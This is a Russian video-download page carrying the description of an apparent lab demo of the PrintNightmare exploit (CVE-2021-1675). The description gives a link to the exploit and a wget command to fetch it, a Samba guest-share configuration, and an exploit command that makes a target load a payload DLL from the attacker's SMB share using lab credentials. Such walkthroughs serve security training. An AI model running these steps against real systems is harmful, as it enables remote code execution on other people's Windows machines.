У нас вы можете посмотреть бесплатно PrintNightmare exploit demo | Windows Print Spooler Vulnerbility | CVE-2021-1675 или скачать в максимальном доступном качестве, видео которое было загружено на ютуб. Для загрузки выберите вариант из формы ниже:
Если кнопки скачивания не
загрузились
НАЖМИТЕ ЗДЕСЬ или обновите страницу
Если возникают проблемы со скачиванием видео, пожалуйста напишите в поддержку по адресу внизу
страницы.
Спасибо за использование сервиса ClipSaver.ru
Hope you like the video :) Subscribe, Like and Comment Landmark: 0:00 - Intro 0:30 - Getting payload from msfvenom 1:28 - Downloading the exploit(printnightmare) 2:52 - Getting impacket packages 4:44 - Configure samba 6:17 - Starting smb share 7:21 - Exploit itself Link to Exploit: https://github.com/cube0x0/CVE-2021-1675 Command to download exploit: wget -O exploit https://github.com/cube0x0/CVE-2021-1... ------------------------------------------------------------------- Samba config file(/etc/samba): [global] client min protocol = CORE client max protocol = SMB3 map to guest = Bad User server role = standalone server usershare allow guests = yes idmap config * : backend = tdb smb ports = 445 [smb] #you can change the name if you want comment = Samba path = /tmp/ guest ok = yes read only = no browsable = yes force user = smbuser ------------------------------------------------------------------- Important commands: ./exploit 10.10.11.106/tony:liltony@10.10.11.106 '\\10.10.14.127\smb\payload.dll' Here: 10.10.11.106 (target machine) 10.10.14.127 (attacking machine) #printnightmare #windowsprintspooler #cve20211675